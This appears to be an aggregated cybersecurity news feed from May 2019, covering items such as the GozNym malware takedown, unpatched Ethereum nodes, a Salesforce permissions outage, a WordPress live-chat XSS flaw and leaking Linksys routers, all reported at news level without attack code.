How to Protect Yourself from Online Cyber Attacks at Work

How A Website Security Scanner Helps Lessen Future Cyber Attacks

The 3 Sectors Most Prone to Cyber Attacks

Businesses Should Be Aware of Growing Cyber Attacks

Artificial Intelligence as the Next Host of Cyber Attacks

The post Do You Know When The First Cyber Attack Took Place? Read On appeared first on .

Companies investing in advanced forensic capabilities to identify attackers in greater detail

One in five companies are already using forensic investigations and other sophisticated methods to identify their attackers, like setting up honey pots and repositories of fake data to give attackers the idea they’ve hit real data while acting as a diversion tactic, according to Neustar. Companies’ growing investment in advanced forensic capabilities that can help identify attackers in greater detail is increasingly eclipsing what most law-enforcement agencies are willing to devote. 72 percent of respondents … More

The post Companies investing in advanced forensic capabilities to identify attackers in greater detail appeared first on Help Net Security.

Things You Need to Know About Open Source – The FAQ Edition

Open Source projects can be a great asset, or they can be a curse. It is all in how you manage it. To be successful in using open source, there are several things to keep in mind, from licensing to updates. And if you ignore any of them, it can cause problems. Here are some […]… Read More

The post Things You Need to Know About Open Source – The FAQ Edition appeared first on The State of Security.

JASK launches a new Heads Up Display for security operations centers

JASK, the provider of the industry’s first cloud-native SIEM platform, unveiled a first-of-its-kind Heads Up Display (HUD) for security operations centers (SOCs) based on cutting-edge scientific design principles and visualization concepts never before used in the cybersecurity industry. Drawing inspiration from leading designers in science fiction and gaming as well as the latest user interface design concepts, the enhanced JASK ASOC platform offers maximal functionality on a single screen. This update enables security teams to … More

The post JASK launches a new Heads Up Display for security operations centers appeared first on Help Net Security.

QuintessenceLabs to extend support for RSA Data Protection Manager software customers

QuintessenceLabs has announced a partnership to allow customers of RSA Data Protection Manager software (DPM) to receive extended support beyond the RSA DPM End-Of-Life date of September 30, 2019. As part of this agreement, QuintessenceLabs will provide the same level of enterprise-class support, Service Level Objectives and product quality as RSA provided. RSA DPM customers can renew their DPM maintenance contract directly with QuintessenceLabs to benefit from long-term DPM support. QuintessenceLabs is also providing a … More

The post QuintessenceLabs to extend support for RSA Data Protection Manager software customers appeared first on Help Net Security.

Checkmarx deploys CxSAST on Project Hosts’ FPC FedRAMP-authorized PaaS

Checkmarx, the Software Exposure Platform for the enterprise, has deployed CxSAST on Project Hosts’ Federal Private Cloud (FPC) FedRAMP-authorized Platform-as-a-Service (PaaS). This deployment facilitates Federal agencies to grant a FedRAMP Moderate or DOD Impact Level 5 (IL5) Authority to Operate (ATO) for a cloud deployment of the Checkmarx CxSAST solution. By being deployed on Project Hosts’ Federal Private Cloud (FPC) FedRAMP-authorized Platform-as-a-Service (PaaS), Checkmarx inherits a vast majority of the controls required for FedRAMP and … More

The post Checkmarx deploys CxSAST on Project Hosts’ FPC FedRAMP-authorized PaaS appeared first on Help Net Security.

ExtraHop for IBM QRadar part of collaborative development to stay ahead of evolving threats

ExtraHop, provider of enterprise cyber analytics from the inside out, launched the ExtraHop for IBM QRadar app, which integrates with IBM Security Intelligence technology to stream accurate, contextual network behavioral detections into the QRadar SIEM. With Reveal(x) detections in QRadar, organizations have a complete picture of suspicious or anomalous behavior on their network, as well as the ability to perform rapid, guided investigations. This bi-directional integration lets analysts move back to ExtraHop to explore forensic … More

The post ExtraHop for IBM QRadar part of collaborative development to stay ahead of evolving threats appeared first on Help Net Security.

HSB Farm Cyber Insurance solution to protect farmers from hackers and malware

Hartford Steam Boiler (HSB), part of Munich Re, announced a new HSB Farm Cyber Insurance solution that helps protect farmers and farm technology from hackers, malware and other cyber attacks. “Innovative technologies are being deployed across the farming industry and data and information systems are helping farmers better understand how to maximize efficiency and production,” said James Hajjar, who leads the cyber practice for HSB’s reinsurance clients. “With this new reliance on digital information and … More

The post HSB Farm Cyber Insurance solution to protect farmers from hackers and malware appeared first on Help Net Security.

Venafi and GlobalSign partnership and integration to address DevOps certificate challenges

Venafi, the leading provider of machine identity protection, and GMO GlobalSign, a global Certificate Authority and leading provider of identity and security solutions for the Internet of Things (IoT), announced an expanded technology partnership and integration that seamlessly addresses DevOps certificate challenges. Additionally, Venafi Cloud is now fully integrated with GlobalSign’s high-performance PKI solutions for enterprises. The integration of Venafi Cloud and GlobalSign PKI for DevOps provides DevOps teams with quick, high-speed access to trusted … More

The post Venafi and GlobalSign partnership and integration to address DevOps certificate challenges appeared first on Help Net Security.

FlexiCapture Cloud now enhanced with REST API and Real-Time Capture

ABBYY, a global leader in Content IQ technologies and solutions, announced a series of innovations to ABBYY FlexiCapture, an AI-enabled enterprise platform to automate document processing workflows and convert unstructured content into structured data for better business outcomes. The updates include the launch of the ABBYY FlexiCapture Cloud REST API (Representational State Transfer Application Programming Interface) and the introduction of the new Real-Time Capture technology for real-time document processing in the cloud. As companies strive … More

The post FlexiCapture Cloud now enhanced with REST API and Real-Time Capture appeared first on Help Net Security.

At-Bay launches excess cyber insurance policy for clients up to $5Bn revenue

At-Bay launched an excess cyber insurance policy for clients across all industry classes. At-Bay developed this product to fulfill broker demand for access to the At-Bay Security Team for organizations with insurance towers. The At-Bay Security Team provides insureds with ongoing vulnerability scanning, threat monitoring, and 24/7 support to help prevent loss. With the new product launch, At-Bay has made these security services available to Excess clients. “We wanted to create an excess program for … More

The post At-Bay launches excess cyber insurance policy for clients up to $5Bn revenue appeared first on Help Net Security.

HITRUST supports Texas legislation to create a Privacy Protection Advisory Council

HITRUST, a leading data protection standards development and certification organization, supports legislation that would create a council to study privacy laws and how privacy practices for Texas businesses could be strengthened through potential legislation. Representative Giovanni Capriglione’s (Southlake) House Bill 4390, passed by the Texas House unanimously on May 7, 2019 and would create the Texas Privacy Protection Advisory Council. The Council would study and evaluate Texas laws and other privacy laws in order to … More

The post HITRUST supports Texas legislation to create a Privacy Protection Advisory Council appeared first on Help Net Security.

Weekly Update 139

Weekly Update 139

Per the beginning of the video, it's out late, I'm jet lagged, all my clothes are dirty and I've had to raid the conference swag cupboard to even find a clean t-shirt. But be that as it may, I'm yet to miss one of these weekly vids in the 2 and a half years I've been doing them and I'm not going to start now! So with that very short intro done, here's this week's and I'll try and be a little more on the ball for the next one.

Weekly Update 139
Weekly Update 139
Weekly Update 139


  1. Google is having some issues with the U2F keys the recommend for their Advanced Protection Program (but seriously, this is a pretty minor issue)
  2. I'm definitely still recommending this approach for locking down Google accounts (that's my piece from November on how to get it all set up)
  3. Forbes had some Magecart script running on their site (interesting breakdown by @bad_packets)
  4. Let's Encrypt's CT log is now up and running (with support from Sectigo too so kudos to them for that, it's a very different approach to the old Comodo)
  5. I'm up for some European Blogger Awards again! (I'd love your votes folks 😎)
  6. Twilio is sponsoring my blog again this week (check how to implement 2FA in your app with Authy)

Ireland And Its Evolving Cybersecurity Issues

Ireland in 2018 experienced a huge decline of malware infection, most especially the lesser cases of ransomware compared to 2017. The European country of almost 5 million people is mirroring the global trend of cybersecurity issues, as cybercriminals are heavily transitioning from the disruptive and destructive ransomware to a silent yet very profitable phishing and cryptojacking. Ireland recorded in 2018 just 1.26% of monthly infection rate, which is one of the lowest in the European region and one of the lowest globally.

This is a sharp contrast to 2017 when millions of computers worldwide were heavily infected by ransomware, more particularly the likes of WannaCry and NoPetya. Cryptojacking is easy to deploy and very difficult to detect, as it is basically a program that consumes CPU/GPU resources like the rest of the programs in a computing device. But the consumed CPU/GPU resources does not produce a tangible output like a typical benign program but rather designed to compute for crypto-hashes in the attempt to mine cryptocurrency.

“While we have seen a welcome drop in ransomware and malware attacks, it would be a mistake to assume the level of the cyber threat to Irish organizations has also decreased. We are seeing major behavioral change amongst criminal hackers, who want access to a victim’s computer and an organization’s network to access data, but also use their computing power to mine for cryptocurrency. This is about playing the long game and exploiting people’s lack of training and understanding when it comes to cybercrime. Microsoft’s analysts predict phishing will continue to be an issue for the foreseeable future for that reason,” explained Des Ryan, Microsoft Ireland’s Solutions Director.

To add insult to injury, Microsoft underscored that many private and public entities in the country lack adequate staff training when it comes to cybersecurity. The vulnerable companies also practice lax IT security protocols, a trait that opens an opportunity for something that goes wrong to grow exponentially.

Also, Read:

5 Fundamental Cybersecurity Issues With Email

Will AI Solve the Gaming Industry’s Cybersecurity Issues?

How Healthcare Organizations Can Solve Cybersecurity Issues

Importance of Changes in Corporate Mindset in Preventing CyberSecurity Issues

Orange’s Acquisition of SecureLink, Set To Expand Cybersecurity Market

The post Ireland And Its Evolving Cybersecurity Issues appeared first on .

Unpatched Ethereum Clients expose the ecosystem to 51% Attack risk

Security researchers from SRLabs have published a report that analyzed the risks for Ethereum network caused by unpatched Ethereum clients.

Researchers at SRLabs published a report based on data, that revealed that a large number of nodes using the popular clients Parity and Geth is still unpatched. The expert discovered that the Ethereum clients and its users remained exposed for “extended periods of time” after security patches have been released.

“SRLabs research suggests that security vulnerabilities remain unpatched for many Ethereum blockchain participants for extended periods of time, putting the blockchain ecosystem at risk.” reads the report.

Experts pointed out that a hacker who controls more than 51% of the computational power in the Ethereum network can double spend coin and undermining the trust in the ecosystem. An attacker that can crash a large number of nodes, could be able to control 51% of the network in an easier way.

For that reason, denial of service issue are classified as high severity in cryptocurrency networks, the attackers can leverage these issue to reduce the amount of computational power needed to perform a 51% attack.

In February, SRLabs reported a vulnerability in the Parity client that could be exploited to remotely crash Parity Ethereum node running versions prior 2.2.10.

“According to our collected data, only two thirds of nodes have been patched so far. Shortly after we reported this vulnerability, Parity released a security alert, urging participants to update their nodes.” continues the report.

A month after the flaw was patched, experts have found that around 40% of all scanned Parity Ethereum nodes remained unpatched. Another patch released on Mar 2, 2019 was installed by around 70% of Parity Ethereum nodes, leaving the remaining 30% exposed.

The situation is worse is we consider that 7 percent of Parity nodes still run a version vulnerable to a critical consensus vulnerability patched in July 2018.

The following graph shows the percentage of unpatched Ethereum nodes in 2019 that decreases slowly over time.

Ethereum nodes.PNG

Researchers explained that the Parity Ethereum has an automated update process, but it suffers from high complexity and some updates are left out. 

The report confirms that the patch management for Geth client is even worse that does not include an auto-update feature. Geth clients remained unpatched for longer periods of time.

“According to their announced headers, around 44% of the Geth nodes visible at were below version v.1.8.20, a security-critical update, released two-month before our measurement.,” continues the SRLabs team.

Experts conclude that the lack of basic patch hygiene undermines the security of the entire Ethereum ecosystem.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – patch management, hacking)

The post Unpatched Ethereum Clients expose the ecosystem to 51% Attack risk appeared first on Security Affairs.

Week in review: New Intel CPU vulnerabilities, SharePoint servers under attack

Here’s an overview of some of last week’s most interesting news and articles: High-risk vulnerability in Cisco’s secure boot process impacts millions of devices Red Balloon Security has discovered a high-risk vulnerability in Cisco’s secure boot process which impacts a wide range of Cisco products in use among enterprise and government networks, including routers, switches and firewalls. Tips to spring clean your company’s social media and stay protected Spring is a great time for organizations … More

The post Week in review: New Intel CPU vulnerabilities, SharePoint servers under attack appeared first on Help Net Security.

Law Enforcement Operation Dismantles GozNym Banking Malware

An international law enforcement operation has led to the dismantling of the global cybercrime networkcybercrime network that used the GozNym banking malware to steal money from bank accounts across the world.

TechCrunch reports, “Europol and the U.S. Justice Department, with help from six other countries, have disrupted and dismantled the GozNym malware, which they say stole more than $100 million from bank accounts since it first emerged.”

Prosecutors have stated, in a press conference held in The Hague, that ten defendants in five countries have been charged with using the GozNym malware to steal money from over 41,000 victims, including business and financial institutions. Of these ten people, five have been arrested in Moldova, Ukraine, Bulgaria, and Russia while the remaining five, all Russians, are on the run. The leader of the cybercrime network and his technical assistant are being prosecuted in Georgia.

TechCrunch security editor Zack Whittaker writes, “All were charged with conspiracy to commit computer fraud, conspiracy to commit wire and bank fraud and conspiracy to commit money laundering. An eleventh member of the conspiracy, Krasimir Nikolov, was previously charged and extradited to the U.S. in 2016 and pleaded guilty in April in his role in the GozNym malware network.”

He adds, “The takedown was described as an “unprecedented international effort” by Scott Brady, U.S. attorney for Western Philadelphia — where a grand jury indicted the defendants — at the press conference announcing the charges.”

The victims of the GozNym attacks have not been named, but it’s reported that in the U.S at least 11 businesses, including two law firms and a casino, plus a church, have been impacted.

The banking malware GozNym was developed from two existing malware families- Gozi and Nymaim- and spread across the U.S, Germany, Poland and Canada. It first emerged in 2016 and has hit dozens of banks and credit unions since then. The leader of the cybercrime network working behind GozNym had built it from the code of the two malware families, both of which had their source code leaked years earlier. He then recruited accomplices and advertised GozNym on Russian speaking forums.

The TechCrunch report explains how GozNym, which is described as malware “as a service”, works- “The malware used encryption and other obfuscation techniques to avoid detection by antivirus tools. Then, spammers are said to have sent hundreds of thousands of phishing emails to infect staff at businesses and banks. After the malware infected its victim computers, the malware would steal the passwords control of bank accounts, which the criminals would later log in and cash out.”

The report further says that according to prosecutors, the GozNym network was “hosted and operated through a bulletproof service, a domain and web hosting known for lax attitudes toward cybercrime and favored by criminals.”

An administrator of the “Avalanche” network, an infrastructure platform which provided services to over 200 cybercriminals and which was dismantled in 2016 during a German-led operation, had also provided bulletproof hosting services to the GozNym network. This administrator would also face prosecution in Ukraine (where his apartment is located) for his role in providing bulletproof hosting services to the GozNym network.

Also, Read:

Security Researchers Uncover Dark Tequila Banking Malware

Ramnit Banking Trojan, August 2018’s Top Malware

Multimedia Editing Software Hacked to Spread Banking Trojan

Malware Attack Using Google Cloud Computing Platform

Redaman Banking Trojan of 2015 Resurrects, Targets Russian Email Users

The post Law Enforcement Operation Dismantles GozNym Banking Malware appeared first on .

Security Affairs newsletter Round 214 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Hacking the ‘Unhackable eyeDisk USB stick
Security breach suffered by credit bureau Equifax has cost $1.4 Billion
Turkish Personal Data Protection Authority fined Facebook for Photo API bug
CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8
Expert discovered how to brick all Samsung mobile phones
Facebook sues data analytics firm Rankwave over alleged data misuse
Over 10k+ GPS trackers could be abused to spy on individuals in the UK
Pacha Group declares war to rival crypto mining hacking groups
Reading the Yoroi Cyber Security Annual Report 2018
Malware Training Sets: FollowUP
Millions of computers powered by Intel chips are affected by MDS flaws
North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal
Thrangrycat flaw could allow compromising millions of Cisco devices
Unprotected DB exposed PII belonging to nearly 90% of Panama citizens
WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware
Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder
Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks
SAP Security Patch Day for May 2019 fixes many missing authorization checks
Twitter inadvertently collected and shared iOS location data
A flaw in Google Titan Security Keys expose users to Bluetooth Attacks
A joint operation by international police dismantled GozNym gang
BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor
Google ‘0Day In the Wild project tracks zero-days exploited in the Wild
Magecart hackers inject card Skimmer in Forbes Subscription Site
Microsoft renewed its Attack Surface Analyzer, version 2.0 is online
Past, present, and future of the Dark Web
The stealthy email stealer in the TA505 hacker groups arsenal
A flaw in Slack could allow hackers to steal, manipulate downloaded files
Chinese state-sponsored hackers breached TeamViewer in 2016
Cisco addressed a critical flaw in networks management tool Prime Infrastructure
Stack Overflow Q&A platform announced a data breach
XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites
Dozens of Linksys router models leak data useful for hackers
Facebook banned Archimedes Group, misinformation made in Israel
Number of hacktivist attacks declined by 95 percent since 2015
Unistellar attackers already wiped over 12,000 MongoDB databases

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 214 – News of the week appeared first on Security Affairs.

Salesforce faced one of its biggest service disruption of ever

Salesforce is facing a huge outage, it shut down a good portion of its infrastructure due to change to the production environment.

A change in the production environment is the root cause of the broad outage suffered by Salesforce.

The service disruption affected its Pardot B2B marketing automation system, the cloud CRM company’s change broke access privileges settings across organizations and gave customers access to all of their respective company’s files.

“One of our projects had all its profiles modified to enable modify all, allowing all users access to all data.” reported a user on Reddit.

In response to the incident, Salesforce has denied all access to a hundred of cloud instances that host Pardot users, the blocked the access for any other user to the same systems, even if they were not using Pardot.

Salesforce customers have been unable to access the service since 09:56 PDT (16:56 UTC) on Friday.

“The deployment of a database script resulted in granting users broader data access than intended,” reads a note published by the company. “To protect our customers, we have blocked access to all instances that contain affected customers until we can complete the removal of the inadvertent permissions in the affected customer orgs.”

salesforce outage

Below the message published by Patrick Harris, Salesforce CTO and co-founder:

A few hours ago, Salesforce informed its users that it was able to restore access to most of its services, this means that the users experienced at least 15 hours of service disruption. Unfortunately, some organizations may still face problems, according to the latest notice issued by the CRM firm administrators will have to manually repair user account permissions.

“We have restored administrators’ access to all orgs affected by the recent permissions issue and have prepared a set of instructions for admins that may need guidance on how to manually restore user permissions. We have updated the instructions to include guidance for Field Service Lightning administrators.” states the company. “Those instructions can be found in this Known Issue article: In parallel, we are working on an automated provisioning fix to allow us to restore user permissions to where they were before the incident occurred.”

The company warns that a limited number of admins may still be experiencing issues such as logging in to their organizations or modifying permissions.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Salesforce, outage)

The post Salesforce faced one of its biggest service disruption of ever appeared first on Security Affairs.

Fraudulently Acquired IPv4 Addresses Revoked by ARIN

The US Registry for Internet Numbers, Ltd. (ARIN) won a legal case, against multi-year program designed to deceive the Internet community by approximately 735,000 IPv4 addresses. John Curran, President, and CEO of ARIN announced that the fraud had been discovered through an internal due diligence process.

ARIN is a non-profit organization responsible for distributing Internet numbers in the United States, Canada and parts of the Caribbean. The emerging market of IPv4 address transmission and growing demand has led to new attempts to fraudulently recover IPv4 addresses.

This is the first arbitration under the ARIN Registration Service Contract and the related process in the US District Court for the Eastern District of Virginia. ARIN has been able to prove the existence of a complicated scheme to fraudulently acquire resources, including many legalized official attestations sent to ARIN. “A company in South Carolina obtained and utilized 11 shelf companies across the United States, and intentionally created false aliases purporting to be officers of those companies, to induce ARIN into issuing the fraudulently sought IPv4 resources and approving related transfers and reassignments of these addresses. The defrauding party was monetizing the assets obtained in the transfer market, and obtained resources under ARIN’s waiting list process.” (ARIN Press Release).

The fraudulent entity adopts an aggressive position after ARIN requests to produce certain documents and explain its behavior. The suspects filed a motion for provisional detention orders and initial orders for ARIN in the US District Court and requested a hearing the following morning just before Christmas. “The aggressive posture was taken after ARIN indicated its intent to revoke addresses, while permitting defrauding entity to renumber to allow existing bona fide customers not to have service interrupted,” ARIN’s General Counsel told CircleID. “The litigation was filed against ARIN to seek an injunction to stop ARIN from revoking and enter arbitration. Some addresses were transferred for money prior to that demand, others were pending transfer and were never transferred due to ARIN investigation.”

Some fraudulently obtained addresses were transferred to third parties; however ARIN made no effort to pursue the parties that received the completed transfer, ARIN’s General Counsel told CircleID. The reason being: “(a) addressed were in another RIR service region (e.g. RIPE NCC and APNIC) and (b) ARIN did not see any evidence they knew of or participated in the fraud. In other words, they appeared to be bona fide 3rd parties.”

On May 1, 2019, ARIN obtained an arbitration award, which included revoking all fraudulent resources and $ 350,000 to ARIN for its legal fees.

UPDATE May 15, 2019: “Charleston Man and Business Indicted in Federal Court in Over $9M Fraud” – United States Department of Justice issues a statement announcing Amir Golestan, 36, of Charleston, and Micfo, LLC, were charged in federal court in a twenty-count indictment. The indictment charges twenty counts of wire fraud, with each count punishable by up to 20 years imprisonment.

Related Resources:

Wireless Network Security Assessment Guide | 5 Step Assessment

Ten Best Network Scanning Tools for Network Security

The post Fraudulently Acquired IPv4 Addresses Revoked by ARIN appeared first on .

Dutch intelligence investigate alleged Huawei ‘backdoor’

Dutch intelligence services are probing Huawei for possibly spying for the Chinese government by using a “back door” in equipment of major telecoms firms.

Dutch intelligence probes Huawei for possibly spying for the Chinese government by using a “back door” in the equipment used by major telecoms firms.

Dutch intelligence shares the concerns raised by other western governments about the risks of involving the Chinese telco giant in the creation of the new 5G mobile phone infrastructure.

Since 2018, US Government has invitedd its allies to exclude Huawei equipment from critical infrastructure and 5G architectures.

According to Dutch newspaper De Volkskrant, the probe into Huawei is being led by the Dutch intelligence agency, AIVD.

The newspaper, citing intelligence sources, revealed that Huawei had alleged access to the data of customers of major telecoms firms in the country, including Vodafone, KPN and T-Mobile. In April, KPN announced a partnership with Huawei to update its 4G networks.

“The report comes at a crucial time in the Netherlands, with Dutch Prime Minister Mark Rutte expected to make an imminent decision on the extent of Huawei’s involvement in the country’s 5G infrastructure.” reported the Telegraph.

AIVD did not comment the report, its spokesman Hilbert Bredemeijer explained that the spy agency “does not comment on possible individual cases.”

Huawei Dutch intelligence

Huawei continues to refuse the accusation of cyber espionage, it also remarked that it is a private company not working for the Chinese intelligence apparatus.

“We do not respond to stories based on anonymous sources or speculation. We have been aware of a Task Force led by the NCTV (Ministry of Justice & Security) for some time to investigate the risks involved in the construction and use of 5G. That was previously announced in a letter from Minister Grapperhaus.” a Huawei spokesperson said.

“It is also known that the three major telecom parties are participating in the risk analysis of the vulnerability of 5G telecommunication networks. This involves looking at what measures are needed to minimize risks. We are in favor of taking general measures that can increase the resilience of telecommunications networks and that apply equally to all relevant parties. We look forward to the results of this report with confidence.”

The Dutch probe is part of a dispute between China and the United States over global trade and cyber espionage.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – 5G, Dutch intelligence services)

The post Dutch intelligence investigate alleged Huawei ‘backdoor’ appeared first on Security Affairs.

Nothing but the truth: the legacy of George Orwell’s Nineteen Eighty-Four

Every generation turns to it in times of political turmoil, and this extract from a new book about the novel examines its relevance in the age of fake news and Trump

Read other extracts from the book:
• David Bowie’s Orwell: how Nineteen Eighty-Four shaped Diamond Dogs
• ‘He typed in bed in his dressing gown’: how Orwell wrote Nineteen Eighty-Four

December 1948. A man sits at a typewriter, in bed, on a remote island, fighting to complete the book that means more to him than any other. He is terribly ill. The book will be finished and, a year or so later, so will the man.

January 2017. Another man stands before a crowd, which is not as large as he would like, in Washington DC, taking the oath of office as the 45th president of the United States of America. His press secretary says that it was the “largest audience to ever witness an inauguration – period – both in person and around the globe”. Asked to justify such a preposterous lie, the president’s adviser describes the statement as “alternative facts”. Over the next four days, US sales of the dead man’s book will rocket by almost 10,000%, making it a No 1 bestseller.

Continue reading...

May I have a word about… Pegasus spyware | Jonathan Bouquet

Is the powerful virus that infected WhatsApp a flying horse or a Trojan horse? Don’t ask the woman who developed it

The unsavoury revelations about the hacking of WhatsApp by software developed by Israeli company, NSO Group, raised some interesting imagery. NSO has developed a powerful smartphone virus called Pegasus, described by NSO co-founder Shalev Hulio as the company’s Trojan horse that could be sent “flying through the air” to infiltrate devices.

Right, let’s get this straight. Pegasus was the son of mortal Medusa and Poseidon, god of the sea. Pegasus and his brother Chrysaor were born from the blood of their beheaded mother, who was tricked and killed by Perseus. Pegasus was represented as a kind-hearted, gentle creature, somewhat naive but always eager to help.

Continue reading...

Number of hacktivist attacks declined by 95 percent since 2015

According to a study conducted by IBM, the number of hacktivist attacks that caused quantifiable damage has declined by 95 percent since 2015.

Even if in Italy the cells of the popular Anonymous collective are very active, the overall number of hacktivist attacks that caused in quantifiable damage to the victim has declined by 95 percent since 2015.

Researchers analyzed data collected by IBM’s X-Force threat intelligence unit between 2015 and 2019. Collected information shows a drop in the hacktivist attacks from 35 in 2015 to only 2 attacks in 2018.

hacktivists attacks 2

However, IBM experts only collected data on hacktivist attacks that resulted in quantifiable damage.

Most of the hacktivist attacks carried out between 2015 and 2018 were attributed to Anonymous (45%), followed at a distance by Lizard Squad (9%), and DownSec and New World Hackers (4%).

hacktivists attacks

“The “IBM X-Force Threat Intelligence Index 2019” highlighted troubling trends in the cybersecurity landscape, including a rise in vulnerability reporting, cryptojacking attacks and attacks on critical infrastructure organizations.” reads a blog post published by IBM. “Yet amid all the concern, there is one threat trend that our data suggests has been on the decline: hacktivism — the subversive use of internet-connected devices and networks to promote a political or social agenda.”

The experts believe that the decline in the number of attacks carried out by hacktivists is caused by two major factors: a drop in attacks launched by Anonymous, and the intensification of the operations conducted by law enforcement that led to the arrests of hacktivists.

Since 2010, Anonymous has become one of the most active collectives of hacktivists in the world, reaching a peak of activity in early- to mid-2016,

At the time, Anonymous hit several high-profile organizations, but according to IBM the group started to decline “possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus.”

X-Force data shows only eight Anonymous attacks in 2015 and 2016, and only one in 2018.

Arrests and legal warnings targeting hacktivists had an important deterrent action, according to IBM law enforcement agencies in the U.S., U.K. and Turkey have arrested at least 62 hacktivists since 2011, but the actual number could be greater.

“Three of the arrested hacktivists received sentences in 2018 and 2019, all with prison time of three years or greater, including one with a 10-year prison sentence.” continues IBM.

The alleged Anonymous member, Martin Gottesfeld, was accused of launching DDoS attacks against the two US healthcare organizations in 2014, the Boston Children’s Hospital and the Wayside Youth and Family Support Network.

In January, the hacktivist was sentenced to 121 months in prison and the judge ordered to pay nearly $443,000 to compensate the damages.

“Where are hacktivist attacks likely to go from here? We are reluctant to say that the era of hacktivism has come to an end. Acute social justice issues, greater organizational capabilities among hacktivist groups and a stronger shift to areas that lay beyond the reach of law enforcement all have the potential to dramatically change the face of hacktivism in a relatively short period of time.” concludes IBM. “More likely than not, we are experiencing a lull in hacktivist activity rather than a conclusion.”

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – hacktivist attacks, hacking)

The post Number of hacktivist attacks declined by 95 percent since 2015 appeared first on Security Affairs.

Hackers Inject Scripts in WordPress Live Chat Plugin

Site administrators using WP Live Chat Support for WordPress are advised to upgrade the plug-in to the latest version to close persistent cross-site scripting (XSS) vulnerability that is exploited without any authentication.

Installed on more than 60,000 websites, the plug-in is presented as a free alternative to complete customer loyalty and chat solution.

The danger of automatic attacks

Sucuri researchers discovered that versions of the plug-in earlier than 8.0.27 are susceptible to persistent XSS issues that can be exploited remotely by a hacker who does not have an account on the affected site.

The hackers can automate their attacks and cover more victims, without having to authenticate on the target site. So going by the popularity of the plugin if you add it, and with little effort of the plugin, you are in for trouble.

Talking about XSS error, it’s quite serious issues, because it allows the hacker to place malicious code on websites or web applications, and then it compromises visitor accounts or shares them on modified pages.

XSS can be persistent if a malicious code is added to a section stored on the server, for instance, user comments. When a user loads the infected page, the malicious code is scanned by the browser and the attacker’s instructions are executed.

The details from Sucuri elucidates how exploiting this vulnerability could be due to unprotected “admin_init hook” – a common attack vector for WordPress plugins.

The researchers say that the wplc_head_basic function did not use the appropriate authorization controls to update the plug-in’s settings.

“Because the ‘admin_init’ hooks can be called by visiting /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, an unauthenticated attacker can use these endpoints to get the ‘wplc_custom_js ‘update arbitrarily’, “Castros details

The content of the option is included on every page that loads live chat support so that hackers who reach a vulnerable site can insert JavaScript code on multiple pages

Sucuri informed developers of the plug-in on April 30 and a corrected version was released on Wednesday.

Related Resources:

Protect Your WordPress Website from SQL Injection

Yet Another WordPress Hack Exploiting Plugin Vulnerabilities

How to Clean Malware-Infected WordPress Website [Infographic]

WordPress Acting Weird? 10 Signs Your Site May Be Hacked


The post Hackers Inject Scripts in WordPress Live Chat Plugin appeared first on .

Dozens of Linksys router models leak data useful for hackers

Dozens of Linksys router models are affected by a flaw that causes the leak of data that can be used by attackers …. and the company won’t fix it.

Security researcher Troy Mursch, Chief Research Officer of Bad Packets, discovered that over 20,000 Linksys wireless routers are leaking full historical records of every device ever connected to them.

The leaked information includes devices’ unique identifiers, names, and operating systems, clearly, these data could be abused by hackers for attacks.

According to Mursch, the root cause of the data leak is a persistent vulnerability that resides in dozens of models of Linksys routers. Unfortunately, the flaw is very easy to exploit, and it is possible.

The devices continue to leak the information even when their firewall is turned on.

The expert used the Binary Edge IoT search engine to find vulnerable devices, earlier this week he discovered 25,617 routers that were leaking a total of 756,565 unique MAC addresses.

The disclosure of the historical records of devices that have connected to a specific router exposes the users to attacks, the knowledge of MAC addresses could be abuse by APT groups in targeted attacks, like the recent supply chain attack against ASUS.

The situation could be worse if owners of the routers were using default admin credentials. The issue discovered by the expert, in fact, could be used by attackers to discover if the vulnerable routers are still using default administrative passwords.

Mursch discovered that about 4,000 of the vulnerable devices were still using the default admin credentials. The vulnerable routers have remote access enabled by default, a gift for hackers that can perform a broad range of malicious activities, such as change DNS settings and deliver malware.

Mursch reported the flaw to Linksys, but unfortunately, the company closed the issue as “Not applicable / Won’t fix.”

Mursch published the list of vulnerable devices released on Pastebin.

Linksys flaw

If you are using one of the vulnerable devices you would replace it.

If you manage a MongoDB instance follow the guidelines on “how to secure a MongoDB database” 

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – LinkSys, Data leak)

The post Dozens of Linksys router models leak data useful for hackers appeared first on Security Affairs.

Breaches and Bugs: How Secure are Your Family’s Favorite Apps?

app safety

app safetyIs your family feeling more vulnerable online lately? If so, you aren’t alone. The recent WhatsApp bug and social media breaches recently have app users thinking twice about security.

Hackers behind the recent WhatsApp malware attack, it’s reported, could record conversations, steal private messages, grab photos and location data, and turn on a device’s camera and microphone. (Is anyone else feeling like you just got caught in the middle an episode of Homeland?)

There’s not much you and your family can do about an attack like this except to stay on top of the news, be sure to share knowledge and react promptly, and discuss device security in your home as much as possible.

How much does your family love its apps? Here’s some insight:

  • Facebook Messenger 3.408 billion downloads
  • WhatsApp 2.979 billion downloads
  • Instagram 1.843 billion downloads
  • Skype 1.039 billion downloads
  • Twitter 833.858 million downloads
  • Candy Crush 805.826 million downloads
  • Snapchat 782.837 million downloads

